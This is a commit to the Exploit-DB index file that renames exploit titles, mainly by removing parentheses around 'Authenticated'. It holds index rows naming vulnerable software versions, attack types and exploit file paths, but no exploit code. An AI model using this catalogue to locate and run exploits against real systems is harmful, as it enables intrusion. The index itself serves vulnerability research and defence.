DB: 2016-09-10

3 new exploits

freeSSHd 1.2.1 - Remote Stack Overflow PoC (Authenticated)
freeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated

freeSSHd 1.2.1 - (Authenticated) Remote SEH Overflow
freeSSHd 1.2.1 - Authenticated Remote SEH Overflow

Debian OpenSSH - (Authenticated) Remote SELinux Privilege Elevation Exploit
Debian OpenSSH - Authenticated Remote SELinux Privilege Elevation Exploit

AvailScript Jobs Portal Script - (Authenticated) (jid) SQL Injection
AvailScript Jobs Portal Script - Authenticated (jid) SQL Injection

AvailScript Jobs Portal Script - (Authenticated) Arbitrary File Upload
AvailScript Jobs Portal Script - Authenticated Arbitrary File Upload
Serv-U 7.3 - (Authenticated) (stou con:1) Denial of Service
Serv-U 7.3 - (Authenticated) Remote FTP File Replacement
Serv-U 7.3 - Authenticated (stou con:1) Denial of Service
Serv-U 7.3 - Authenticated Remote FTP File Replacement

freeSSHd 1.2.1 - (Authenticated) SFTP rename Remote Buffer Overflow PoC
freeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow PoC

LoudBlog 0.8.0a - (Authenticated) (ajax.php) SQL Injection
LoudBlog 0.8.0a - Authenticated (ajax.php) SQL Injection

freeSSHd 1.2.1 - (Authenticated) SFTP realpath Remote Buffer Overflow PoC
freeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow PoC

Hannon Hill Cascade Server - (Authenticated) Command Execution
Hannon Hill Cascade Server - Authenticated Command Execution

Telnet-Ftp Service Server 1.x - (Authenticated) Multiple Vulnerabilities
Telnet-Ftp Service Server 1.x - Authenticated Multiple Vulnerabilities

Femitter FTP Server 1.x - (Authenticated) Multiple Vulnerabilities
Femitter FTP Server 1.x - Authenticated Multiple Vulnerabilities

Cpanel - (Authenticated) (lastvisit.html domain) Arbitrary File Disclosure
Cpanel - Authenticated (lastvisit.html domain) Arbitrary File Disclosure

MySQL 5.0.45 - (Authenticated) COM_CREATE_DB Format String PoC
MySQL 5.0.45 - Authenticated COM_CREATE_DB Format String PoC

FtpXQ FTP Server 3.0 - (Authenticated) Remote Denial of Service
FtpXQ FTP Server 3.0 - Authenticated Remote Denial of Service

NetAccess IP3 - (Authenticated) (ping option) Command Injection
NetAccess IP3 - Authenticated (ping option) Command Injection

Novell eDirectory 8.8 SP5 - (Authenticated) Remote Buffer Overflow
Novell eDirectory 8.8 SP5 - Authenticated Remote Buffer Overflow

Apache Axis2 Administration console - (Authenticated) Cross-Site Scripting
Apache Axis2 Administration console - Authenticated Cross-Site Scripting
Easy FTP Server 1.7.0.11 - (Authenticated) 'MKD' Command Remote Buffer Overflow
Easy FTP Server 1.7.0.11 - (Authenticated) 'LIST' Command Remote Buffer Overflow
Easy FTP Server 1.7.0.11 - Authenticated 'MKD' Command Remote Buffer Overflow
Easy FTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow

Easy FTP Server 1.7.0.11 - (Authenticated) 'CWD' Command Remote Buffer Overflow
Easy FTP Server 1.7.0.11 - Authenticated 'CWD' Command Remote Buffer Overflow

Easy FTP Server 1.7.0.11 - (Authenticated) 'LIST' Command Remote Buffer Overflow (Metasploit)
Easy FTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow (Metasploit)

UPlusFTP Server 1.7.1.01 - (Authenticated) HTTP Remote Buffer Overflow
UPlusFTP Server 1.7.1.01 - Authenticated HTTP Remote Buffer Overflow

Easy FTP Server 1.7.0.11 - (Authenticated) Multiple Commands Remote Buffer Overflow
Easy FTP Server 1.7.0.11 - Authenticated Multiple Commands Remote Buffer Overflow

ActFax Server FTP 4.25 Build 0221 (2010-02-11) - (Authenticated) Remote Buffer Overflow
ActFax Server FTP 4.25 Build 0221 (2010-02-11) - Authenticated Remote Buffer Overflow

ActFax Server FTP - (Authenticated) Remote Buffer Overflow
ActFax Server FTP - Authenticated Remote Buffer Overflow

Oracle Database - Protocol  Authentication Bypass
Oracle Database - Protocol Authentication Bypass

IRIS Citations Management Tool - (Authenticated) Remote Command Execution
IRIS Citations Management Tool - Authenticated Remote Command Execution

Airmail 3.0.2 - Cross-Site Scripting

LamaHub 0.0.6.2 - Buffer Overflow

Vodafone Mobile Wifi - Reset Admin Password

Zabbix 2.0 - 3.0.3 - SQL Injection
Zabbix 2.0 < 3.0.3 - SQL Injection

Acuity CMS 2.6.2 - (ASP ) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter Arbitrary File Upload / Code Execution
Acuity CMS 2.6.2 - (ASP) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter Arbitrary File Upload / Code Execution

GLPI 0.85.5 -  Arbitrary File Upload / Filter Bypass / Remote Code Execution
GLPI 0.85.5 - Arbitrary File Upload / Filter Bypass / Remote Code Execution
Alfresco - /proxy endpoint Parameter Server Side Request Forgery (SSRF)
Alfresco - /cmisbrowser url Parameter Server Side Request Forgery (SSRF)
Alfresco - /proxy endpoint Parameter Server Side Request Forgery
Alfresco - /cmisbrowser url Parameter Server Side Request Forgery

vBulletin 5.2.2 - Unauthenticated Server Side Request Forgery (SSRF)
vBulletin 5.2.2 - Unauthenticated Server Side Request Forgery
This commit is contained in:
Offensive Security 2016-09-10 05:08:39 +00:00
parent 0be1ea959a
commit 7607be84a3
5 changed files with 289 additions and 46 deletions

View file

@ -5335,7 +5335,7 @@ id,file,description,date,author,platform,type,port
5706,platforms/php/webapps/5706.php,"EasyWay CMS - 'index.php mid' SQL Injection",2008-05-31,Lidloses_Auge,php,webapps,0
5707,platforms/php/webapps/5707.txt,"Social Site Generator - (path) Remote File Inclusion",2008-05-31,vBmad,php,webapps,0
5708,platforms/php/webapps/5708.txt,"Joomla Component prayercenter 1.4.9 - 'id' SQL Injection",2008-05-31,His0k4,php,webapps,0
5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Remote Stack Overflow PoC (Authenticated)",2008-05-31,securfrog,windows,dos,0
5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated",2008-05-31,securfrog,windows,dos,0
5710,platforms/php/webapps/5710.pl,"Joomla Component com_biblestudy 1.5.0 - 'id' SQL Injection",2008-05-31,Stack,php,webapps,0
5711,platforms/php/webapps/5711.txt,"Social Site Generator 2.0 - Multiple Remote File Disclosure Vulnerabilities",2008-06-01,Stack,php,webapps,0
5712,platforms/multiple/dos/5712.pl,"Samba (client) - receive_smb_raw() Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos,0
@ -5375,7 +5375,7 @@ id,file,description,date,author,platform,type,port
5748,platforms/php/webapps/5748.txt,"Joomla Component JoomlaDate - (user) SQL Injection",2008-06-05,His0k4,php,webapps,0
5749,platforms/multiple/dos/5749.pl,"Asterisk - (SIP channel driver / in pedantic mode) Remote Crash",2008-06-05,"Armando Oliveira",multiple,dos,0
5750,platforms/windows/remote/5750.html,"Black Ice Software Inc Barcode SDK - 'BIDIB.ocx' Multiple Vulnerabilities",2008-06-05,shinnai,windows,remote,0
5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 - (Authenticated) Remote SEH Overflow",2008-06-06,ryujin,windows,remote,22
5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 - Authenticated Remote SEH Overflow",2008-06-06,ryujin,windows,remote,22
5752,platforms/php/webapps/5752.pl,"Joomla Component GameQ 4.0 - SQL Injection",2008-06-07,His0k4,php,webapps,0
5753,platforms/asp/webapps/5753.txt,"JiRo?s FAQ Manager (read.asp fID) 1.0 - SQL Injection",2008-06-08,Zigma,asp,webapps,0
5754,platforms/php/webapps/5754.txt,"phpinv 0.8.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-08,"CWH Underground",php,webapps,0
@ -5709,7 +5709,7 @@ id,file,description,date,author,platform,type,port
6090,platforms/windows/dos/6090.html,"PPMate PPMedia Class - ActiveX Control Buffer Overflow (PoC)",2008-07-17,"Guido Landi",windows,dos,0
6091,platforms/php/webapps/6091.txt,"PHPHoo3 <= 5.2.6 - (PHPHoo3.php viewCat) SQL Injection",2008-07-17,Mr.SQL,php,webapps,0
6092,platforms/php/webapps/6092.txt,"Alstrasoft Video Share Enterprise 4.5.1 - (UID) SQL Injection",2008-07-17,"Hussin X",php,webapps,0
6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - (Authenticated) Remote SELinux Privilege Elevation Exploit",2008-07-17,eliteboy,linux,remote,0
6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - Authenticated Remote SELinux Privilege Elevation Exploit",2008-07-17,eliteboy,linux,remote,0
6095,platforms/php/webapps/6095.pl,"Alstrasoft Article Manager Pro 1.6 - Blind SQL Injection",2008-07-17,GoLd_M,php,webapps,0
6096,platforms/php/webapps/6096.txt,"preCMS 1 - 'index.php' SQL Injection",2008-07-17,Mr.SQL,php,webapps,0
6097,platforms/php/webapps/6097.txt,"Artic Issue Tracker 2.0.0 - (index.php filter) SQL Injection",2008-07-17,QTRinux,php,webapps,0
@ -5997,7 +5997,7 @@ id,file,description,date,author,platform,type,port
6413,platforms/php/webapps/6413.txt,"Zanfi CMS lite 1.2 - Multiple Local File Inclusion",2008-09-10,SirGod,php,webapps,0
6414,platforms/windows/remote/6414.html,"Peachtree Accounting 2004 - 'PAWWeb11.ocx' ActiveX Insecure Method",2008-09-10,"Jeremy Brown",windows,remote,0
6416,platforms/php/webapps/6416.txt,"Libera CMS 1.12 - 'cookie' SQL Injection",2008-09-10,StAkeR,php,webapps,0
6417,platforms/php/webapps/6417.txt,"AvailScript Jobs Portal Script - (Authenticated) (jid) SQL Injection",2008-09-10,InjEctOr5,php,webapps,0
6417,platforms/php/webapps/6417.txt,"AvailScript Jobs Portal Script - Authenticated (jid) SQL Injection",2008-09-10,InjEctOr5,php,webapps,0
6419,platforms/php/webapps/6419.txt,"Zanfi CMS lite 2.1 / Jaw Portal free - 'FCKeditor' Arbitrary File Upload",2008-09-10,reptil,php,webapps,0
6420,platforms/asp/webapps/6420.txt,"aspwebalbum 3.2 - Multiple Vulnerabilities",2008-09-10,e.wiZz!,asp,webapps,0
6421,platforms/php/webapps/6421.php,"WordPress 2.6.1 - (SQL Column Truncation) Admin Takeover Exploit",2008-09-10,iso^kpsbr,php,webapps,0
@ -6089,7 +6089,7 @@ id,file,description,date,author,platform,type,port
6511,platforms/php/webapps/6511.txt,"6rbScript 3.3 - (singerid) SQL Injection",2008-09-21,"Hussin X",php,webapps,0
6512,platforms/php/webapps/6512.txt,"Diesel Job Site - (job_id) Blind SQL Injection",2008-09-21,Stack,php,webapps,0
6513,platforms/php/webapps/6513.txt,"Rianxosencabos CMS 0.9 - Arbitrary Add Admin",2008-09-21,"CWH Underground",php,webapps,0
6514,platforms/php/webapps/6514.txt,"AvailScript Jobs Portal Script - (Authenticated) Arbitrary File Upload",2008-09-21,InjEctOr5,php,webapps,0
6514,platforms/php/webapps/6514.txt,"AvailScript Jobs Portal Script - Authenticated Arbitrary File Upload",2008-09-21,InjEctOr5,php,webapps,0
6515,platforms/windows/dos/6515.c,"DESlock+ 3.2.7 - (vdlptokn.sys) Local Denial of Service",2008-09-21,"NT Internals",windows,dos,0
6516,platforms/php/webapps/6516.txt,"e107 Plugin Image Gallery 0.9.6.2 - (image) SQL Injection",2008-09-21,boom3rang,php,webapps,0
6517,platforms/php/webapps/6517.txt,"Netartmedia Jobs Portal 1.3 - Multiple SQL Injections",2008-09-21,"Encrypt3d.M!nd ",php,webapps,0
@ -6232,8 +6232,8 @@ id,file,description,date,author,platform,type,port
6657,platforms/php/webapps/6657.pl,"IP Reg 0.4 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0
6658,platforms/windows/dos/6658.txt,"VBA32 Personal AntiVirus 3.12.8.x - (malformed archive) Denial of Service",2008-10-03,LiquidWorm,windows,dos,0
6659,platforms/php/webapps/6659.txt,"Full PHP Emlak Script - 'arsaprint.php id' SQL Injection",2008-10-03,"Hussin X",php,webapps,0
6660,platforms/windows/dos/6660.txt,"Serv-U 7.3 - (Authenticated) (stou con:1) Denial of Service",2008-10-03,dmnt,windows,dos,0
6661,platforms/windows/remote/6661.txt,"Serv-U 7.3 - (Authenticated) Remote FTP File Replacement",2008-10-03,dmnt,windows,remote,0
6660,platforms/windows/dos/6660.txt,"Serv-U 7.3 - Authenticated (stou con:1) Denial of Service",2008-10-03,dmnt,windows,dos,0
6661,platforms/windows/remote/6661.txt,"Serv-U 7.3 - Authenticated Remote FTP File Replacement",2008-10-03,dmnt,windows,remote,0
6662,platforms/php/webapps/6662.pl,"AdaptCMS Lite 1.3 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0
6663,platforms/php/webapps/6663.txt,"CCMS 3.1 - (skin) Multiple Local File Inclusion",2008-10-03,SirGod,php,webapps,0
6664,platforms/php/webapps/6664.txt,"Kwalbum 2.0.2 - Arbitrary File Upload",2008-10-03,"CWH Underground",php,webapps,0
@ -6368,18 +6368,18 @@ id,file,description,date,author,platform,type,port
6797,platforms/php/webapps/6797.txt,"LightBlog 9.8 - (GET & POST & COOKIE) Multiple Local File Inclusion Vulnerabilities",2008-10-21,JosS,php,webapps,0
6798,platforms/windows/local/6798.pl,"VLC Media Player - '.TY' File Stack Based Buffer Overflow",2008-10-21,"Guido Landi",windows,local,0
6799,platforms/php/webapps/6799.txt,"ShopMaker 1.0 - (product.php id) SQL Injection",2008-10-21,"Hussin X",php,webapps,0
6800,platforms/windows/dos/6800.pl,"freeSSHd 1.2.1 - (Authenticated) SFTP rename Remote Buffer Overflow PoC",2008-10-22,"Jeremy Brown",windows,dos,0
6800,platforms/windows/dos/6800.pl,"freeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow PoC",2008-10-22,"Jeremy Brown",windows,dos,0
6801,platforms/windows/remote/6801.txt,"Opera 9.60 - Persistent Cross-Site Scripting",2008-10-22,"Roberto Suggi Liverani",windows,remote,0
6802,platforms/php/webapps/6802.txt,"Joomla Component Daily Message 1.0.3 - 'id' SQL Injection",2008-10-22,H!tm@N,php,webapps,0
6803,platforms/php/webapps/6803.txt,"Iamma Simple Gallery 1.0/2.0 - Arbitrary File Upload",2008-10-22,x0r,php,webapps,0
6804,platforms/windows/remote/6804.pl,"GoodTech SSH - (SSH_FXP_OPEN) Remote Buffer Overflow",2008-10-22,r0ut3r,windows,remote,22
6805,platforms/multiple/dos/6805.txt,"LibSPF2 < 1.2.8 - DNS TXT Record Parsing Bug Heap Overflow (PoC)",2008-10-22,"Dan Kaminsky",multiple,dos,0
6806,platforms/php/webapps/6806.txt,"phpcrs 2.06 - (importFunction) Local File Inclusion",2008-10-22,Pepelux,php,webapps,0
6808,platforms/php/webapps/6808.pl,"LoudBlog 0.8.0a - (Authenticated) (ajax.php) SQL Injection",2008-10-22,Xianur0,php,webapps,0
6808,platforms/php/webapps/6808.pl,"LoudBlog 0.8.0a - Authenticated (ajax.php) SQL Injection",2008-10-22,Xianur0,php,webapps,0
6809,platforms/php/webapps/6809.txt,"Joomla Component ionFiles 4.4.2 - File Disclosure",2008-10-22,Vrs-hCk,php,webapps,0
6810,platforms/asp/webapps/6810.txt,"DorsaCMS - 'ShowPage.aspx' SQL Injection",2008-10-22,syst3m_f4ult,asp,webapps,0
6811,platforms/php/webapps/6811.txt,"YDC - 'kdlist.php cat' SQL Injection",2008-10-22,"Hussin X",php,webapps,0
6812,platforms/windows/dos/6812.pl,"freeSSHd 1.2.1 - (Authenticated) SFTP realpath Remote Buffer Overflow PoC",2008-10-22,"Jeremy Brown",windows,dos,0
6812,platforms/windows/dos/6812.pl,"freeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow PoC",2008-10-22,"Jeremy Brown",windows,dos,0
6813,platforms/windows/remote/6813.html,"Opera 9.52/9.60 - Persistent Cross-Site Scripting Code Execution (PoC)",2008-10-23,"Aviv Raff",windows,remote,0
6814,platforms/php/webapps/6814.php,"CSPartner 1.0 - (Delete All Users / SQL Injection) Remote Exploit",2008-10-23,StAkeR,php,webapps,0
6815,platforms/windows/dos/6815.pl,"SilverSHielD 1.0.2.34 - (opendir) Denial of Service",2008-10-23,"Jeremy Brown",windows,dos,0
@ -7759,7 +7759,7 @@ id,file,description,date,author,platform,type,port
8244,platforms/php/webapps/8244.txt,"Bloginator 1a - SQL Injection / Command Injection (via Cookie Bypass Exploit)",2009-03-19,Fireshot,php,webapps,0
8245,platforms/multiple/dos/8245.c,"SW-HTTPD Server 0.x - Remote Denial of Service",2009-03-19,"Jonathan Salwan",multiple,dos,0
8246,platforms/windows/local/8246.pl,"Chasys Media Player - '.lst Playlist' Local Buffer Overflow",2009-03-19,zAx,windows,local,0
8247,platforms/cgi/webapps/8247.txt,"Hannon Hill Cascade Server - (Authenticated) Command Execution",2009-03-19,"Emory University",cgi,webapps,0
8247,platforms/cgi/webapps/8247.txt,"Hannon Hill Cascade Server - Authenticated Command Execution",2009-03-19,"Emory University",cgi,webapps,0
8248,platforms/windows/remote/8248.py,"POP Peeper 3.4.0.0 - (From) Remote Buffer Overflow (SEH)",2009-03-20,His0k4,windows,remote,0
8249,platforms/windows/local/8249.php,"BS.Player 2.34 Build 980 - '.bsl' Local Buffer Overflow (SEH)",2009-03-20,Nine:Situations:Group,windows,local,0
8250,platforms/windows/local/8250.txt,"CloneCD/DVD ElbyCDIO.sys < 6.0.3.2 - Privilege Escalation",2009-03-20,"NT Internals",windows,local,0
@ -7785,7 +7785,7 @@ id,file,description,date,author,platform,type,port
8270,platforms/windows/local/8270.pl,"eXeScope 6.50 - Local Buffer Overflow",2009-03-23,Koshi,windows,local,0
8271,platforms/php/webapps/8271.php,"Pluck CMS 4.6.1 - (module_pages_site.php post) Local File Inclusion",2009-03-23,"Alfons Luja",php,webapps,0
8272,platforms/php/webapps/8272.pl,"Codice CMS 2 - SQL Command Execution",2009-03-23,darkjoker,php,webapps,0
8273,platforms/windows/remote/8273.c,"Telnet-Ftp Service Server 1.x - (Authenticated) Multiple Vulnerabilities",2009-03-23,"Jonathan Salwan",windows,remote,0
8273,platforms/windows/remote/8273.c,"Telnet-Ftp Service Server 1.x - Authenticated Multiple Vulnerabilities",2009-03-23,"Jonathan Salwan",windows,remote,0
8274,platforms/windows/local/8274.pl,"POP Peeper 3.4.0.0 - '.eml' Universal Overwrite (SEH)",2009-03-23,Stack,windows,local,0
8275,platforms/windows/local/8275.pl,"POP Peeper 3.4.0.0 - '.html' Universal Overwrite (SEH)",2009-03-23,Stack,windows,local,0
8276,platforms/php/webapps/8276.pl,"Syzygy CMS 0.3 - Local File Inclusion / SQL Command Injection",2009-03-23,Osirys,php,webapps,0
@ -7795,7 +7795,7 @@ id,file,description,date,author,platform,type,port
8280,platforms/windows/local/8280.txt,"Adobe Acrobat Reader - JBIG2 Universal Exploit (Bind Shell Port 5500)",2009-03-24,"Black Security",windows,local,0
8281,platforms/windows/dos/8281.txt,"Microsoft GdiPlus - EMF GpFont.SetData Integer Overflow (PoC)",2009-03-24,"Black Security",windows,dos,0
8282,platforms/php/webapps/8282.txt,"SurfMyTV Script 1.0 - (view.php id) SQL Injection",2009-03-24,x0r,php,webapps,0
8283,platforms/windows/remote/8283.c,"Femitter FTP Server 1.x - (Authenticated) Multiple Vulnerabilities",2009-03-24,"Jonathan Salwan",windows,remote,0
8283,platforms/windows/remote/8283.c,"Femitter FTP Server 1.x - Authenticated Multiple Vulnerabilities",2009-03-24,"Jonathan Salwan",windows,remote,0
8284,platforms/windows/remote/8284.pl,"IncrediMail 5.86 - (Cross-Site Scripting) Script Execution Exploit",2009-03-24,"Bui Quang Minh",windows,remote,0
8285,platforms/multiple/dos/8285.txt,"Mozilla Firefox XSL - Parsing Remote Memory Corruption PoC (1)",2009-03-25,"Guido Landi",multiple,dos,0
8287,platforms/php/webapps/8287.php,"PHPizabi 0.848b C1 HFP1-3 - Arbitrary File Upload",2009-03-25,EgiX,php,webapps,0
@ -8525,7 +8525,7 @@ id,file,description,date,author,platform,type,port
9036,platforms/php/webapps/9036.txt,"PHP-Sugar 0.80 - (index.php t) Local File Inclusion",2009-06-29,ahmadbady,php,webapps,0
9037,platforms/php/webapps/9037.txt,"Clicknet CMS 2.1 - (side) Arbitrary File Disclosure",2009-06-29,"ThE g0bL!N",php,webapps,0
9038,platforms/windows/local/9038.py,"HT-MP3Player 1.0 - '.ht3' Universal Buffer Overflow (SEH)",2009-06-29,His0k4,windows,local,0
9039,platforms/multiple/remote/9039.txt,"Cpanel - (Authenticated) (lastvisit.html domain) Arbitrary File Disclosure",2009-06-29,SecurityRules,multiple,remote,0
9039,platforms/multiple/remote/9039.txt,"Cpanel - Authenticated (lastvisit.html domain) Arbitrary File Disclosure",2009-06-29,SecurityRules,multiple,remote,0
9040,platforms/php/webapps/9040.txt,"Joomla com_bookflip - (book_id) SQL Injection",2009-06-29,boom3rang,php,webapps,0
9041,platforms/php/webapps/9041.txt,"Audio Article Directory - (file) Remote File Disclosure",2009-06-29,"ThE g0bL!N",php,webapps,0
9042,platforms/php/webapps/9042.pl,"NEWSolved 1.1.6 - (login grabber) Multiple SQL Injection",2009-06-29,jmp-esp,php,webapps,0
@ -8568,7 +8568,7 @@ id,file,description,date,author,platform,type,port
9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 vfs.usermount - Privilege Escalation",2009-07-09,"Patroklos Argyroudis",freebsd,local,0
9083,platforms/linux/local/9083.c,"Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86_64) - set_selection() UTF-8 Off-by-One Local Exploit",2009-07-09,sgrakkyu,linux,local,0
9084,platforms/windows/dos/9084.txt,"Soulseek 157 NS < 13e/156.x - Remote Peer Search Code Execution (PoC)",2009-07-09,"laurent gaffié ",windows,dos,0
9085,platforms/multiple/dos/9085.txt,"MySQL 5.0.45 - (Authenticated) COM_CREATE_DB Format String PoC",2009-07-09,kingcope,multiple,dos,0
9085,platforms/multiple/dos/9085.txt,"MySQL 5.0.45 - Authenticated COM_CREATE_DB Format String PoC",2009-07-09,kingcope,multiple,dos,0
9086,platforms/php/webapps/9086.txt,"MRCGIGUY Thumbnail Gallery Post 1b - Arbitrary File Upload",2009-07-09,"ThE g0bL!N",php,webapps,0
9087,platforms/php/webapps/9087.php,"Nwahy Dir 2.1 - Arbitrary Change Admin Password",2009-07-09,rEcruit,php,webapps,0
9088,platforms/php/webapps/9088.txt,"Glossword 1.8.11 - Arbitrary Uninstall / Install",2009-07-09,Evil-Cod3r,php,webapps,0
@ -9124,7 +9124,7 @@ id,file,description,date,author,platform,type,port
9661,platforms/windows/local/9661.c,"MP3 Studio 1.0 - '.m3u' Local Buffer Overflow",2009-09-14,dmc,windows,local,0
9662,platforms/windows/remote/9662.c,"IPSwitch IMAP Server 9.20 - Remote Buffer Overflow",2009-09-14,dmc,windows,remote,143
9663,platforms/windows/remote/9663.py,"Mozilla Firefox 2.0.0.16 - UTF-8 URL Remote Buffer Overflow",2009-09-14,dmc,windows,remote,0
9664,platforms/windows/dos/9664.py,"FtpXQ FTP Server 3.0 - (Authenticated) Remote Denial of Service",2009-09-14,PLATEN,windows,dos,0
9664,platforms/windows/dos/9664.py,"FtpXQ FTP Server 3.0 - Authenticated Remote Denial of Service",2009-09-14,PLATEN,windows,dos,0
9665,platforms/php/webapps/9665.pl,"PHP Pro Bid - Blind SQL Injection",2009-09-14,NoGe,php,webapps,0
9666,platforms/hardware/dos/9666.php,"Apple Safari IPhone - (using tel:) Remote Crash",2009-09-14,cloud,hardware,dos,0
9667,platforms/windows/dos/9667.c,"Cerberus FTP Server 3.0.3 - Remote Denial of Service",2009-09-14,"Single Eye",windows,dos,0
@ -9146,7 +9146,7 @@ id,file,description,date,author,platform,type,port
9685,platforms/windows/dos/9685.txt,"EasyMail Quicksoft 6.0.2.0 - (CreateStore) ActiveX Code Execution (PoC)",2009-09-15,"Francis Provencher",windows,dos,0
9686,platforms/windows/dos/9686.py,"VLC Media Player < 0.9.6 - (CUE) Local Buffer Overflow (PoC)",2009-09-15,Dr_IDE,windows,dos,0
9687,platforms/windows/local/9687.py,"SAP Player 0.9 - '.pla' Universal Local Buffer Overflow (SEH)",2009-09-15,mr_me,windows,local,0
9688,platforms/hardware/local/9688.txt,"NetAccess IP3 - (Authenticated) (ping option) Command Injection",2009-09-15,r00t,hardware,local,0
9688,platforms/hardware/local/9688.txt,"NetAccess IP3 - Authenticated (ping option) Command Injection",2009-09-15,r00t,hardware,local,0
9689,platforms/windows/dos/9689.pl,"MP3 Collector 2.3 - '.m3u' Local Crash (PoC)",2009-09-15,zAx,windows,dos,0
9690,platforms/windows/remote/9690.py,"BigAnt Server 2.50 - GET Request Remote Buffer Overflow (SEH) Universal",2009-09-15,hack4love,windows,remote,6660
9691,platforms/windows/dos/9691.pl,"DJ Studio Pro 4.2 - '.pls' Local Crash",2009-09-15,prodigy,windows,dos,0
@ -10148,7 +10148,7 @@ id,file,description,date,author,platform,type,port
11019,platforms/php/webapps/11019.txt,"MobPartner Counter - Arbitrary File Upload",2010-01-06,"wlhaan hacker",php,webapps,0
11020,platforms/windows/dos/11020.pl,"GOM Audio - Local Crash (PoC)",2010-01-06,applicationlayer,windows,dos,0
11021,platforms/windows/dos/11021.txt,"Flashget 3.x - IEHelper Remote Exec (PoC)",2010-01-06,superli,windows,dos,0
11022,platforms/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 - (Authenticated) Remote Buffer Overflow",2010-01-06,"His0k4 and Simo36",novell,remote,0
11022,platforms/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 - Authenticated Remote Buffer Overflow",2010-01-06,"His0k4 and Simo36",novell,remote,0
11023,platforms/asp/webapps/11023.txt,"Erolife AjxGaleri VT - Database Disclosure",2010-01-06,LionTurk,asp,webapps,0
11024,platforms/php/webapps/11024.txt,"Joomla Component com_perchagallery - SQL Injection",2010-01-06,FL0RiX,php,webapps,0
11025,platforms/php/webapps/11025.txt,"AWCM - Database Disclosure",2010-01-06,alnjm33,php,webapps,0
@ -11581,7 +11581,7 @@ id,file,description,date,author,platform,type,port
12686,platforms/php/webapps/12686.txt,"Online University - (Authentication Bypass) SQL Injection",2010-05-21,"cr4wl3r ",php,webapps,0
12687,platforms/windows/dos/12687.pl,"WinDirectAudio 1.0 - '.wav' (PoC)",2010-05-21,ahwak2000,windows,dos,0
12688,platforms/php/webapps/12688.txt,"JV2 Folder Gallery 3.1 - 'gallery.php' Remote File Inclusion",2010-05-21,"Sn!pEr.S!Te Hacker",php,webapps,0
12689,platforms/multiple/webapps/12689.txt,"Apache Axis2 Administration console - (Authenticated) Cross-Site Scripting",2010-05-21,"Richard Brain",multiple,webapps,0
12689,platforms/multiple/webapps/12689.txt,"Apache Axis2 Administration console - Authenticated Cross-Site Scripting",2010-05-21,"Richard Brain",multiple,webapps,0
12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - 'FCKeditor' Arbitrary File Upload",2010-05-21,Ma3sTr0-Dz,php,webapps,0
12691,platforms/php/webapps/12691.txt,"Online Job Board - (Authentication Bypass) SQL Injection",2010-05-21,"cr4wl3r ",php,webapps,0
14322,platforms/php/webapps/14322.txt,"Edgephp ClickBank Affiliate Marketplace Script - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0
@ -12649,10 +12649,10 @@ id,file,description,date,author,platform,type,port
14397,platforms/windows/local/14397.rb,"MoreAmp - Buffer Overflow (SEH) (Metasploit)",2010-07-17,Madjix,windows,local,0
14404,platforms/php/webapps/14404.txt,"Kayako eSupport 3.70.02 - 'functions.php' SQL Injection",2010-07-18,ScOrPiOn,php,webapps,0
14405,platforms/php/webapps/14405.txt,"PHP-Fusion - Remote Command Execution",2010-07-18,"ViRuS Qalaa",php,webapps,0
14399,platforms/windows/remote/14399.py,"Easy FTP Server 1.7.0.11 - (Authenticated) 'MKD' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0
14400,platforms/windows/remote/14400.py,"Easy FTP Server 1.7.0.11 - (Authenticated) 'LIST' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0
14399,platforms/windows/remote/14399.py,"Easy FTP Server 1.7.0.11 - Authenticated 'MKD' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0
14400,platforms/windows/remote/14400.py,"Easy FTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0
14401,platforms/asp/webapps/14401.txt,"ClickAndRank Script - Authentication Bypass",2010-07-18,walid,asp,webapps,0
14402,platforms/windows/remote/14402.py,"Easy FTP Server 1.7.0.11 - (Authenticated) 'CWD' Command Remote Buffer Overflow",2010-07-18,fdiskyou,windows,remote,0
14402,platforms/windows/remote/14402.py,"Easy FTP Server 1.7.0.11 - Authenticated 'CWD' Command Remote Buffer Overflow",2010-07-18,fdiskyou,windows,remote,0
14403,platforms/windows/local/14403.txt,"Microsoft Windows - Automatic LNK Shortcut File Code Execution",2010-07-18,Ivanlef0u,windows,local,0
14406,platforms/bsd/local/14406.pl,"Ghostscript - '.PostScript' File Stack Overflow",2010-07-18,"Rodrigo Rubira Branco",bsd,local,0
14407,platforms/aix/remote/14407.c,"rpc.pcnfsd - Remote Format String",2010-07-18,"Rodrigo Rubira Branco",aix,remote,0
@ -12692,7 +12692,7 @@ id,file,description,date,author,platform,type,port
14448,platforms/php/webapps/14448.txt,"Joomla Component (com_golfcourseguide) 0.9.6.0 (Beta) / 1 (Beta) - SQL Injection",2010-07-23,Valentin,php,webapps,0
